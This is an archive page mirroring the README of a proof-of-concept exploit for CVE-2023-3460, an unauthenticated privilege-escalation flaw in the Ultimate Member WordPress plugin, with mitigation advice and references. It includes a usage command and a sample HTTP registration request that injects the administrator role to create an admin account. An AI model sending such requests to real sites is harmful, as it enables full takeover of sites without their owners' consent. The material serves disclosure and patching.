Goal Reached Thanks to every supporter β€” we hit 100%!

Goal: 1000 CNY Β· Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-3460 PoC β€” Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation

Source
https://github.com/GURJOTEXPERT/CVE-2023-3460
Associated Vulnerability
Title:Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation (CVE-2023-3460)
Description:The Ultimate Member WordPress plugin before 2.6.7 does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.
Readme

# 🚨 CVE-2023-3460 - WordPress Ultimate Member Privilege Escalation Exploit

This is a proof-of-concept (PoC) exploit for [CVE-2023-3460](https://nvd.nist.gov/vuln/detail/CVE-2023-3460), a critical vulnerability in the WordPress plugin **Ultimate Member**. It allows **unauthenticated users** to escalate their privileges to **Administrator** by crafting a malicious registration request.

> πŸ”₯ **Impact:** Full site compromise through unauthorized admin account creation.

---

## πŸ“Œ Vulnerability Details

- **Plugin Affected:** Ultimate Member
- **Affected Versions:** ≀ 2.6.6
- **Fixed Version:** 2.6.7
- **Exploit Type:** Privilege Escalation via Registration Abuse
- **Authentication Required:** ❌ No
- **CVE:** [CVE-2023-3460](https://nvd.nist.gov/vuln/detail/CVE-2023-3460)

---

## βš™οΈ Requirements

- Python 3
- `requests` library

Install requirements:

```bash
pip3 install requests
```

---

## πŸ§ͺ Exploit Usage

```bash
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> -e <EMAIL>
```

### βœ… Example:

```bash
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 -e pwn@evil.com
```

---

## πŸ“₯ Exploit Script Features

- Fetches CSRF nonce (`_wpnonce`) from the register page
- Bypasses form validation
- Injects `wp_capabilities` with `administrator` role
- Creates a new admin user without authentication

---

## πŸ” Sample Exploit Payload

```http
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
user_email=pwn@evil.com&
user_password=Pass@123&
wp_cΓ pabilities[administrator]=1&
_um_nonce=<nonce_value>
```

---

## πŸ›‘οΈ Mitigation

- Update Ultimate Member plugin to **v2.6.7** or above
- Disable open registration if not required
- Monitor user creation logs for suspicious activity

---

## πŸ“š References

- πŸ”— [Patchstack Advisory](https://patchstack.com/database/vulnerability/ultimate-member/wordpress-ultimate-member-plugin-2-6-6-authenticated-privilege-escalation-vulnerability)
- πŸ”— [CVE-2023-3460 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-3460)

---

## ⚠️ Disclaimer

This script is provided for **educational and authorized testing purposes only**. Unauthorized exploitation of systems is illegal and unethical. Use it **only** on systems you own or have permission to test.

---

## πŸ‘¨β€πŸ’» Author

- πŸ’€ [GURJOT SINGH]
- πŸ”’ [Linkdin: https://in.linkedin.com/in/gurjot-singh-8198b3220]
File Snapshot

 [4.0K]  /data/pocs/9c7688bdcce13920444eaf4102ee24f068dcaf1c
β”œβ”€β”€ [3.5K]  CVE-2023-3460.py
└── [2.4K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers β€” if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online β€” thank you for the support. View subscription plans β†’